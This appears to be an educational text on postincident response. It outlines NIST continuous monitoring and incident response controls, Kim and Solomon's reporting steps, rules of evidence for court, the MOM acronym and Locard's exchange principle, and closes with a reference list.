Identity Theft Response

Information security continuous monitoring (ISCM) is defined as "maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions" (Dempsey et al., 2011).

Incidents, often discovered under an ISCM plan, are the result of thwarted controls, even when the organization is implementing adequate risk mitigation, for instance using the risk management framework (RMF) outlined by the National Institute for Standards and Technology (NIST, 2010).

Incident response controls outlined in NIST Special Publication 800-53 are aimed at recognizing and handling incidents and mitigating and remediating the damage that could result from incidents (NIST, 2013). An incident is an event that results in a violation of security protocols. Once an incident has occurred, it is important that the organization assess the damage to its critical infrastructure.

An important part of any postincident process is to document as accurately as possible the nature and cause(s) of the incident in case it needs to be presented in court. A postincident report should follow some simple steps, as outlined by Kim and Solomon:

· Preparation of the incident report: Decide how to respond to the threat or incident and form an incident report team.

· Identification: Did the incident really happen? If it did occur, is it damaging to the organization? This is not a rhetorical question. An incident or event may not be serious enough to allocate resources and manpower to address.

· Notification: This is an important step in the postincident report. If an event or incident has taken place, the appropriate authorities must be notified immediately. Sometimes senior managers find a problem but do not communicate to key stakeholders for fear of losing their jobs or a company losing its reputation and clients' trust.

· Response: In this step, senior managers articulate the best possible way to address the incident while minimizing downtime.

· Recovery: Once the appropriate measures have been taken to address an incident, senior managers must reexamine the organization's system to make sure the threat or vulnerability has been eliminated.

· Follow-up: Now that the system is up and running, senior managers and leadership must ask: What have we learned from this incident? What policies or procedures need to be updated? What can we do to prevent another occurrence?

· Documentation and reporting: Document the incident and its cause(s) and use it as a teaching moment.

Any postincident handling must follow the rules of evidence in accordance with applicable laws and regulations. This will ensure admissibility, authenticity, completeness, reliability, and believability of the postincident evidence if it is required or necessary to be presented in court. While cybersecurity law is still relatively new, there are certain rules for evidence to be introduced in court (Braid, 2002):

· Admissible evidence stands up in court.

· Authentic evidence is relevant to the incident.

· Complete evidence is objective and represents alternative interpretations.

· Reliable evidence is grounded in truth.

· Believable evidence is clear and easy for a jury to understand.

In addition to following the rules of evidence, senior managers and senior leadership must also remember that in most instances, a professional criminal cyberforensic expert may be called to help with the postincident report. It a cybercrime forensics expert is called in, it is important he or she has credentials and certification.

Also, a cyberforensics expert must remember that crime does not happen in isolation; criminals use take advantage of the means to commit a crime, the opportunity to commit a crime, and they usually have a motive. Cybersecurity professionals refer to means, opportunity, and motives by the acronym MOM.

Another important concept in the postincident report is that whenever a crime is committed, the criminal not only takes something away but also leaves something behind. This is known as Locard's exchange principle.

References

Braid, M. (2002). Collecting electronic evidence after a system compromise. https://www.giac.org/paper/gsec/659/collecting-electronic-evidence-system-compromise/101519

Dempsey, K., Chawla, N. S., Johnson, A., Johnston, R., Jones, A. C., Orebaugh, A, Scholl, M., & Stine, K. (2011, September). Special publication 800-137: Information security continuous monitoring (ISCM) for federal information systems and organizations. National Institute of Standards and Technology (NIST). http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-137.pdf

Kim, D., & Solomon, M. (2018). Fundamentals of information systems security (3rd ed.). Jones & Bartlett Learning.

National Institute of Standards and Technology (NIST). (2010, February). Special  publication 800-37, Revision 1: Guide for applying the risk management framework to federal information systems. http://dx.doi.org/10.6028/NIST.SP.800-37r1

National Institute of Standards and Technology (NIST). (2013, April). Special publication 800-53: Security and privacy controls for federal information systems and organizations. http://dx.doi.org/10.6028/NIST.SP.800-53r4